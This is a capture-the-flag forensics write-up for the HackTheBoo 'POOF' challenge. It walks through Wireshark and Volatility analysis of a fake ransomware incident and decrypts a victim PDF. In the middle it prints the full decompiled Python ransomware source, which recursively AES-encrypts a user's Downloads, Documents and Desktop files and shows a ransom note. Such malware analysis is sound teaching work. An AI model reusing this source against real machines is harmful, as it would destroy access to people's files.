siunam's Website

My personal website

Home Writeups Blog Projects About E-Portfolio

POOF

Background

In my company, we are developing a new python game for Halloween. I’m the leader of this project; thus, I want it to be unique. So I researched the most cutting-edge python libraries for game development until I stumbled upon a private game-dev discord server. One member suggested I try a new python library that provides enhanced game development capabilities. I was excited about it until I tried it. Quite simply, all my files are encrypted now. Thankfully I manage to capture the memory and the network traffic of my Linux server during the incident. Can you analyze it and help me recover my files? To get the flag, connect to the docker service and answer the questions. WARNING! Do not try to run the malware on your host. It may harm your computer!

Difficulty: Easy

In this challenge, we can spawn a docker instance and download a file!

┌──(root🌸siunam)-[~/ctf/HackTheBoo/Forensics/POOF]
└─# unzip forensics_poof.zip 
Archive:  forensics_poof.zip
  inflating: candy_dungeon.pdf.boo   
  inflating: mem.dmp                 
  inflating: poof_capture.pcap       
  inflating: Ubuntu_4.15.0-184-generic_profile.zip 

┌──(root🌸siunam)-[~/ctf/HackTheBoo/Forensics/POOF]
└─# file *              
candy_dungeon.pdf.boo:                 data
forensics_poof.zip:                    Zip archive data, at least v2.0 to extract, compression method=deflate
mem.dmp:                               ELF 64-bit LSB core file, x86-64, version 1 (SYSV)
poof_capture.pcap:                     pcap capture file, microsecond ts (little-endian) - version 2.4 (Ethernet, capture length 262144)
Ubuntu_4.15.0-184-generic_profile.zip: Zip archive data, at least v2.0 to extract, compression method=deflate

Find the flag

Question 1

We can nc in to the docker IP!

┌──(root🌸siunam)-[~/ctf/HackTheBoo/Forensics/POOF]
└─# nc 167.71.137.174 32661

+-----------+---------------------------------------------------------+
|   Title   |                       Description                       |
+-----------+---------------------------------------------------------+
| Downgrade |          During recent auditing, we noticed that        |
|           |     network authentication is not forced upon remote    |
|           |       connections to our Windows 2012 server. That      |
|           |           led us to investigate our system for          |
|           |  suspicious logins further. Provided the server's event |
|           |       logs, can you find any suspicious successful      |
|           |                          login?                         |
+-----------+---------------------------------------------------------+

Which is the malicious URL that the ransomware was downloaded from? (for example: http://maliciousdomain/example/file.extension)
> 

Looks like we need to do some malware analysis!

In poof_capture.pcap, we can open it via WireShark:

┌──(root🌸siunam)-[~/ctf/HackTheBoo/Forensics/POOF]
└─# wireshark poof_capture.pcap

Let’s filter all HTTP requests!

The first GET request looks sussy!

Let’s follow HTTP stream!

Found it!

Which is the malicious URL that the ransomware was downloaded from? (for example: http://maliciousdomain/example/file.extension)
> http://files.pypi-install.com/packages/a5/61/caf3af6d893b5cb8eae9a90a3054f370a92130863450e3299d742c7a65329d94/pygaming-dev-13.37.tar.gz
[+] Correct!

Question 2

What is the name of the malicious process? (for example: malicious)
>

Next, we can use volatility to investigate the memory! (Note: I’m using Volatility python 2 version.)

Create custom profile:

┌──(root🌸siunam)-[~/ctf/HackTheBoo/Forensics/POOF]
└─# cp Ubuntu_4.15.0-184-generic_profile.zip /opt/volatility/volatility/plugins/overlays/linux/

Verify the profile is created:

┌──(root🌸siunam)-[~/ctf/HackTheBoo/Forensics/POOF]
└─# python2 /opt/volatility/vol.py --info | grep Ubuntu
Volatility Foundation Volatility Framework 2.6.1
LinuxUbuntu_4_15_0-184-generic_profilex64 - A Profile for Linux Ubuntu_4.15.0-184-generic_profile x64

Check the banner:

┌──(root🌸siunam)-[~/ctf/HackTheBoo/Forensics/POOF]
└─# python2 /opt/volatility/vol.py -f mem.dmp linux_banner --profile=LinuxUbuntu_4_15_0-184-generic_profilex64
Volatility Foundation Volatility Framework 2.6.1
Linux version 4.15.0-184-generic (buildd@lcy02-amd64-006) (gcc version 7.5.0 (Ubuntu 7.5.0-3ubuntu1~18.04)) #194-Ubuntu SMP Thu Jun 2 18:54:48 UTC 2022 (Ubuntu 4.15.0-184.194-generic 4.15.18)

Dump all the processes:

┌──(root🌸siunam)-[~/ctf/HackTheBoo/Forensics/POOF]
└─# python2 /opt/volatility/vol.py -f mem.dmp linux_psaux --profile=LinuxUbuntu_4_15_0-184-generic_profilex64 
Volatility Foundation Volatility Framework 2.6.1
Pid    Uid    Gid    Arguments                                                       
[...]
1312   1000   1000   -bash                                                           
1340   1000   1000   ./configure                                                     
1341   1000   1000   ./configure       

The ./configure looks sussy!

What is the name of the malicious process? (for example: malicious)

> configure
[+] Correct!

Question 3

Provide the md5sum of the ransomware file.
> 

Lists files referenced by the filesystem cache:

┌──(root🌸siunam)-[~/ctf/HackTheBoo/Forensics/POOF]
└─# python2 /opt/volatility/vol.py -f mem.dmp linux_enumerate_files --profile=LinuxUbuntu_4_15_0-184-generic_profilex64
[...]
0xffff9d00bc4d8dc0                    268276 /home/developer/Documents
0xffff9d00bc4dcdf8                    268279 /home/developer/Documents/halloween_python_game
0xffff9d00bc4dbcd8                    268280 /home/developer/Documents/halloween_python_game/candy_dungeon.pdf.boo
0xffff9d00bc4df038                    268290 /home/developer/Documents/halloween_python_game/pygaming-dev-13.37.tar.gz.boo
0xffff9d00bc4debf0                    268285 /home/developer/Documents/halloween_python_game/game.py.boo
0xffff9d00bc4da770                    268291 /home/developer/Documents/halloween_python_game/pygaming-dev-13.37
               0x0 ------------------------- /home/developer/Documents/halloween_python_game/pygaming-dev-13.37/configure?6222983
0xffff9d00bc4de7a8                    268292 /home/developer/Documents/halloween_python_game/pygaming-dev-13.37/configure
[...]

The configure malware is in /home/developer/Documents/halloween_python_game/pygaming-dev-13.37/configure.

Recovers the entire cached file system from memory:

┌──(root🌸siunam)-[~/ctf/HackTheBoo/Forensics/POOF]
└─# python2 /opt/volatility/vol.py -f mem.dmp linux_recover_filesystem --dump-dir=dump/ --profile=LinuxUbuntu_4_15_0-184-generic_profilex64                  
┌──(root🌸siunam)-[~/…/developer/Documents/halloween_python_game/pygaming-dev-13.37]
└─# md5sum configure 
c6bc2b3d16cbbc7e9d7304e71ae6f0e6  configure

But it’s wrong…

> c6bc2b3d16cbbc7e9d7304e71ae6f0e6
[-] Wrong Answer.

The reason why it’s wrong is because we’re looking at the wrong file.

Let’s take a step back.

We can use linux_elfs to find ELF binaries in process mappings:

┌──(root🌸siunam)-[~/ctf/HackTheBoo/Forensics/POOF]
└─# python2 /opt/volatility/vol.py -f mem.dmp linux_elfs --profile=LinuxUbuntu_4_15_0-184-generic_profilex64
Volatility Foundation Volatility Framework 2.6.1
Pid      Name              Start              End                Elf Path                                                     Needed
-------- ----------------- ------------------ ------------------ ------------------------------------------------------------ ------
[...]
1340 configure         0x0000000000400000 0x0000000000424688 /home/developer/Documents/hal...pygaming-dev-13.37/configure libdl.so.2,libz.so.1,libpthread.so.0,libc.so.6
1340 configure         0x00007f33e8093000 0x00007f33e8483ae0 libc.so.6                                                    ld-linux-x86-64.so.2
1340 configure         0x00007f33e8484000 0x00007f33e86a2480 libpthread.so.0                                              libc.so.6,ld-linux-x86-64.so.2
1340 configure         0x00007f33e86a3000 0x00007f33e88bf0b0 libz.so.1                                                    libc.so.6
1340 configure         0x00007f33e88c0000 0x00007f33e8ac3110 libdl.so.2                                                   libc.so.6,ld-linux-x86-64.so.2
1341 configure         0x0000000000400000 0x0000000000424688 /home/developer/Documents/hal...pygaming-dev-13.37/configure libdl.so.2,libz.so.1,libpthread.so.0,libc.so.6
1341 configure         0x00007f6c4b205000 0x00007f6c4b416738 libnss_files.so.2                                            libc.so.6
1341 configure         0x00007f6c4b417000 0x00007f6c4b630a58 libnsl.so.1                                                  libc.so.6
1341 configure         0x00007f6c4b631000 0x00007f6c4b83c588 libnss_nis.so.2                                              libnsl.so.1,libnss_files.so.2,libc.so.6
1341 configure         0x00007f6c4b83d000 0x00007f6c4ba468c0 libnss_compat.so.2                                           libc.so.6
1341 configure         0x00007f6c4ba47000 0x00007f6c4bc4a050 /tmp/_MEIiYpNyP/Crypto/Cipher/_raw_aesni.abi3.so             libpthread.so.0,libc.so.6
1341 configure         0x00007f6c4bc4b000 0x00007f6c4be51038 /tmp/_MEIiYpNyP/Crypto/Cipher/_raw_aes.abi3.so               libpthread.so.0,libc.so.6
1341 configure         0x00007f6c4be52000 0x00007f6c4c054048 /tmp/_MEIiYpNyP/Crypto/Cipher/_raw_ocb.abi3.so               libpthread.so.0,libc.so.6
1341 configure         0x00007f6c4c055000 0x00007f6c4c256038 /tmp/_MEIiYpNyP/Crypto/Hash/_ghash_clmul.abi3.so             libpthread.so.0,libc.so.6
1341 configure         0x00007f6c4c257000 0x00007f6c4c458038 /tmp/_MEIiYpNyP/Crypto/Hash/_ghash_portable.abi3.so          libpthread.so.0,libc.so.6
1341 configure         0x00007f6c4c459000 0x00007f6c4c65a028 /tmp/_MEIiYpNyP/Crypto/Util/_cpuid_c.abi3.so
[...]
┌──(root🌸siunam)-[~/…/POOF/dump/tmp/_MEIiYpNyP]
└─# ls -lah       
total 9.6M
drwx------  4 nam  nam  4.0K Oct 26 01:29 .
drwxrwxrwx 10 root root 4.0K Oct 26 02:10 ..
-rwx------  1 nam  nam  769K Oct 20 05:10 base_library.zip
drwx------  8 nam  nam  4.0K Oct 26 01:29 Crypto
-rwx------  1 nam  nam   66K Oct 20 05:10 libbz2.so.1.0
-rwx------  1 nam  nam  2.8M Oct 20 05:10 libcrypto.so.1.1
drwx------  2 nam  nam  4.0K Oct 26 01:29 lib-dynload
-rwx------  1 nam  nam  199K Oct 20 05:10 libexpat.so.1
-rwx------  1 nam  nam   31K Oct 20 05:10 libffi.so.6
-rwx------  1 nam  nam  151K Oct 20 05:10 liblzma.so.5
-rwx------  1 nam  nam  4.5M Oct 20 05:10 libpython3.6m.so.1.0
-rwx------  1 nam  nam  288K Oct 20 05:10 libreadline.so.7
-rwx------  1 nam  nam  564K Oct 20 05:10 libssl.so.1.1
-rwx------  1 nam  nam  167K Oct 20 05:10 libtinfo.so.5
-rwx------  1 nam  nam  115K Oct 20 05:10 libz.so.1

Hmm… This looks like the shared libraries to encrypt all the files.

But none of them all correct…

Let’s take a step back, and reviewing what we have:

┌──(root🌸siunam)-[~/ctf/HackTheBoo/Forensics/POOF]
└─# ls -lah 
[...]
-rw-r--r-- 1 root root 2.5M Oct 26 05:38 candy_dungeon.pdf.boo
-rw-r--r-- 1 nam  nam  205M Oct 26 07:43 forensics_poof.zip
-rw-r--r-- 1 root root 1.1G Oct 26 05:21 mem.dmp
-rw-r--r-- 1 root root 7.5M Oct 26 05:23 poof_capture.pcap
-rw-r--r-- 1 root root 1.1M Oct 26 05:48 Ubuntu_4.15.0-184-generic_profile.zip

We should really take a look at the pcap file again:

┌──(root🌸siunam)-[~/ctf/HackTheBoo/Forensics/POOF]
└─# wireshark poof_capture.pcap

In WireShark, I remember we can export objects:

Hmm… How about we export the HTTP object?

Oh! We found the original ransomeware!

┌──(root🌸siunam)-[~/ctf/HackTheBoo/Forensics/POOF]
└─# file pygaming-dev-13.37.tar.gz 
pygaming-dev-13.37.tar.gz: gzip compressed data, last modified: Wed Oct 26 09:13:31 2022, from Unix, original size modulo 2^32 7505920

Let’s use tar to extract that!

┌──(root🌸siunam)-[~/ctf/HackTheBoo/Forensics/POOF]
└─# tar -xf pygaming-dev-13.37.tar.gz

┌──(root🌸siunam)-[~/ctf/HackTheBoo/Forensics/POOF]
└─# ls -alh pygaming-dev-13.37
total 7.2M
drwxr-xr-x 2 root root 4.0K Oct 26 05:13 .
drwxr-xr-x 3 root root 4.0K Oct 27 04:35 ..
-rwxr-xr-x 1 root root 7.2M Oct 26 05:12 configure

md5sum:

┌──(root🌸siunam)-[~/ctf/HackTheBoo/Forensics/POOF]
└─# md5sum pygaming-dev-13.37/configure
c010fb1fdf8315bc442c334886804e00  pygaming-dev-13.37/configure
Provide the md5sum of the ransomware file.

> c010fb1fdf8315bc442c334886804e00
[+] Correct!

Question 4

Which programming language was used to develop the ransomware? (for example: nim)
> 

Let’s reverse engineer that ransomware via strings!

┌──(root🌸siunam)-[~/…/HackTheBoo/Forensics/POOF/pygaming-dev-13.37]
└─# strings configure
[...]
%s%c%s.py
[...]
Which programming language was used to develop the ransomware? (for example: nim)
> python
[+] Correct!

Question 5

After decompiling the ransomware, what is the name of the function used for encryption? (for example: encryption)
> 

Hmm… This is a compiled python executable, but it’s an ELF executable??

After I fumbling around, I found that we can decompile python ELF exectuable, to pyc, to py!

According to HackTricks, we can decompile ELF executable to pyc:

┌──(root🌸siunam)-[~/…/HackTheBoo/Forensics/POOF/pygaming-dev-13.37]
└─# python /opt/pyinstxtractor/pyinstxtractor.py configure 
[+] Processing configure
[+] Pyinstaller version: 2.1+
[+] Python version: 3.6
[+] Length of package: 7448630 bytes
[+] Found 79 files in CArchive
[+] Beginning extraction...please standby
[+] Possible entry point: pyiboot01_bootstrap.pyc
[+] Possible entry point: pyi_rth_subprocess.pyc
[+] Possible entry point: pyi_rth_pkgutil.pyc
[+] Possible entry point: pyi_rth_inspect.pyc
[+] Possible entry point: configure.pyc
[!] Warning: This script is running in a different Python version than the one used to build the executable.
[!] Please run this script in Python 3.6 to prevent extraction errors during unmarshalling
[!] Skipping pyz extraction
[+] Successfully extracted pyinstaller archive: configure

You can now use a python decompiler on the pyc files within the extracted directory
                                                                                                       
┌──(root🌸siunam)-[~/…/HackTheBoo/Forensics/POOF/pygaming-dev-13.37]
└─# ls -lah configure_extracted 
total 11M
drwxr-xr-x 5 root root 4.0K Oct 27 04:58 .
drwxr-xr-x 3 root root 4.0K Oct 27 04:58 ..
-rw-r--r-- 1 root root 769K Oct 27 04:58 base_library.zip
-rw-r--r-- 1 root root 3.0K Oct 27 04:58 configure.pyc
drwxr-xr-x 8 root root 4.0K Oct 27 04:58 Crypto
-rw-r--r-- 1 root root  66K Oct 27 04:58 libbz2.so.1.0
-rw-r--r-- 1 root root 2.8M Oct 27 04:58 libcrypto.so.1.1
drwxr-xr-x 2 root root 4.0K Oct 27 04:58 lib-dynload
-rw-r--r-- 1 root root 199K Oct 27 04:58 libexpat.so.1
-rw-r--r-- 1 root root  31K Oct 27 04:58 libffi.so.6
-rw-r--r-- 1 root root 151K Oct 27 04:58 liblzma.so.5
-rw-r--r-- 1 root root 4.5M Oct 27 04:58 libpython3.6m.so.1.0
-rw-r--r-- 1 root root 288K Oct 27 04:58 libreadline.so.7
-rw-r--r-- 1 root root 564K Oct 27 04:58 libssl.so.1.1
-rw-r--r-- 1 root root 167K Oct 27 04:58 libtinfo.so.5
-rw-r--r-- 1 root root 115K Oct 27 04:58 libz.so.1
-rw-r--r-- 1 root root 1.4K Oct 27 04:58 pyiboot01_bootstrap.pyc
-rw-r--r-- 1 root root 1.7K Oct 27 04:58 pyimod01_os_path.pyc
-rw-r--r-- 1 root root 8.6K Oct 27 04:58 pyimod02_archive.pyc
-rw-r--r-- 1 root root  18K Oct 27 04:58 pyimod03_importers.pyc
-rw-r--r-- 1 root root 3.6K Oct 27 04:58 pyimod04_ctypes.pyc
-rw-r--r-- 1 root root  672 Oct 27 04:58 pyi_rth_inspect.pyc
-rw-r--r-- 1 root root 1.1K Oct 27 04:58 pyi_rth_pkgutil.pyc
-rw-r--r-- 1 root root  809 Oct 27 04:58 pyi_rth_subprocess.pyc
-rw-r--r-- 1 root root 1.3M Oct 27 04:58 PYZ-00.pyz
drwxr-xr-x 2 root root 4.0K Oct 27 04:58 PYZ-00.pyz_extracted
-rw-r--r-- 1 root root  293 Oct 27 04:58 struct.pyc

Then, we can decompile the pyc to py:

Since my uncompyle6 is kinda broken, I’ll use an online tool to decompile it:

┌──(root🌸siunam)-[~/…/HackTheBoo/Forensics/POOF/pygaming-dev-13.37]
└─# uncompyle6 -h
I don't know about Python version '3.10.7' yet.
Python versions 3.9 and greater are not supported.

from Crypto.Cipher import AES
from sys import exit
import random, string, time, os

def Pkrr1fe0qmDD9nKx(filename: str, data: bytes) -> None:
    open(filename, 'wb').write(data)
    os.rename(filename, f"{filename}.boo")


def mv18jiVh6TJI9lzY(filename: str) -> None:
    data = open(filename, 'rb').read()
    key = 'vN0nb7ZshjAWiCzv'
    iv = 'ffTC776Wt59Qawe1'
    cipher = AES.new(key.encode('utf-8'), AES.MODE_CFB, iv)
    ct = cipher.encrypt(data)
    Pkrr1fe0qmDD9nKx(filename, ct)


def w7oVNKAyN8dlWJk() -> str:
    letters = string.ascii_lowercase + string.digits
    _id = ''.join(random.choice(letters) for i in range(32))
    return _id


def print_note() -> None:
    _id = w7oVNKAyN8dlWJk()
    banner = f"\n\nPippity poppity give me your property!\n\n\t   *                  ((((\n*            *        *  (((\n\t   *                (((      *\n  *   / \\        *     *(((    \n   __/___\\__  *          (((\n\t (O)  |         *     ((((\n*  '<   ? |__ ... .. .             *\n\t \\@      \\    *    ... . . . *\n\t //__     \t// ||\\__   \\    |~~~~~~ . . .   *\n====M===M===| |=====|~~~~~~   . . .. .. .\n\t\t *  \\ \\ \\   |~~~~~~    *\n  *         <__|_|   ~~~~~~ .   .     ... .\n\t\nPOOF!\n\nDon't you speak English? Use https://translate.google.com/?sl=en&tl=es&op=translate \n\nYOU GOT TRICKED! Your home folder has been encrypted due to blind trust.\nTo decrypt your files, you need the private key that only we possess. \n\nYour ID: {_id}\n\nDon't waste our time and pay the ransom; otherwise, you will lose your precious files forever.\n\nWe accept crypto or candy.\n\nDon't hesitate to get in touch with cutie_pumpkin@ransomwaregroup.com during business hours.\n\n\t"
    print(banner)
    time.sleep(60)


def yGN9pu2XkPTWyeBK(directory: str) -> list:
    filenames = []
    for filename in os.listdir(directory):
        result = os.path.join(directory, filename)
        if os.path.isfile(result):
            filenames.append(result)
        else:
            filenames.extend(yGN9pu2XkPTWyeBK(result))

    return filenames


def main() -> None:
    username = os.getlogin()
    if username != 'developer13371337':
        exit(1)
    directories = [f"/home/{username}/Downloads",
     f"/home/{username}/Documents",
     f"/home/{username}/Desktop"]
    for directory in directories:
        if os.path.exists(directory):
            files = yGN9pu2XkPTWyeBK(directory)
            for fil in files:
                try:
                    mv18jiVh6TJI9lzY(fil)
                except Exception as e:
                    pass

    print_note()


if __name__ == '__main__':
    main()

In the function mv18jiVh6TJI9lzY, it’s using AES to encrypt data:

def mv18jiVh6TJI9lzY(filename: str) -> None:
    data = open(filename, 'rb').read()
    key = 'vN0nb7ZshjAWiCzv'
    iv = 'ffTC776Wt59Qawe1'
    cipher = AES.new(key.encode('utf-8'), AES.MODE_CFB, iv)
    ct = cipher.encrypt(data)
    Pkrr1fe0qmDD9nKx(filename, ct)
After decompiling the ransomware, what is the name of the function used for encryption? (for example: encryption)

> mv18jiVh6TJI9lzY
[+] Correct!

Question 6

Decrypt the given file, and provide its md5sum.
> 

Now, we have to decrypt the given file, which is the candy_dungeon.pdf.boo.

To do so, I’ll:

In the function print_note, it tells us how to decrypt the file:

def print_note() -> None:
    _id = w7oVNKAyN8dlWJk()
    banner = f"\n\nPippity poppity give me your property!\n\n\t   *                  ((((\n*            *        *  (((\n\t   *                (((      *\n  *   / \\        *     *(((    \n   __/___\\__  *          (((\n\t (O)  |         *     ((((\n*  '<   ? |__ ... .. .             *\n\t \\@      \\    *    ... . . . *\n\t //__     \t// ||\\__   \\    |~~~~~~ . . .   *\n====M===M===| |=====|~~~~~~   . . .. .. .\n\t\t *  \\ \\ \\   |~~~~~~    *\n  *         <__|_|   ~~~~~~ .   .     ... .\n\t\nPOOF!\n\nDon't you speak English? Use https://translate.google.com/?sl=en&tl=es&op=translate \n\nYOU GOT TRICKED! Your home folder has been encrypted due to blind trust.\nTo decrypt your files, you need the private key that only we possess. \n\nYour ID: {_id}\n\nDon't waste our time and pay the ransom; otherwise, you will lose your precious files forever.\n\nWe accept crypto or candy.\n\nDon't hesitate to get in touch with cutie_pumpkin@ransomwaregroup.com during business hours.\n\n\t"
    print(banner)
    time.sleep(60)
To decrypt your files, you need the private key that only we possess.

The encryption keys are hardcoded in function mv18jiVh6TJI9lzY:

key = 'vN0nb7ZshjAWiCzv'
iv = 'ffTC776Wt59Qawe1'
┌──(root🌸siunam)-[~/ctf/HackTheBoo/Forensics/POOF]
└─# cp candy_dungeon.pdf.boo candy_dungeon.pdf.boo.bak
#!/usr/bin/env python3

from Crypto.Cipher import AES

def decryption():
  key = 'vN0nb7ZshjAWiCzv'
  iv = 'ffTC776Wt59Qawe1'
  file = './candy_dungeon.pdf.boo'

  ct = open(file, 'rb').read()
  cipher = AES.new(key.encode('utf-8'), AES.MODE_CFB, iv=iv.encode('utf-8'))
  pt = cipher.decrypt(ct)
  open('decrypted.pdf', 'wb').write(pt)

if __name__ == '__main__':
  decryption()

Output:

┌──(root🌸siunam)-[~/ctf/HackTheBoo/Forensics/POOF]
└─# python3 decrypt_file.py

┌──(root🌸siunam)-[~/ctf/HackTheBoo/Forensics/POOF]
└─# file decrypted.pdf 
decrypted.pdf: PDF document, version 1.4

Let’s open this PDF!

┌──(root🌸siunam)-[~/ctf/HackTheBoo/Forensics/POOF]
└─# evince decrypted.pdf

We successfully decrypted the file!

Let’s md5sum this file and submit it!

┌──(root🌸siunam)-[~/ctf/HackTheBoo/Forensics/POOF]
└─# md5sum decrypted.pdf
3bc9f072f5a7ed4620f57e6aa8d7e1a1  decrypted.pdf
Decrypt the given file, and provide its md5sum.

> 3bc9f072f5a7ed4620f57e6aa8d7e1a1
[+] Correct!

[+] Here is the flag: HTB{n3v3r_tru5t_4ny0n3_3sp3c14lly_dur1ng_h4ll0w33n}

Finally got the flag!

Conclusion

What we’ve learned:

  1. Memory Forensics via Volatility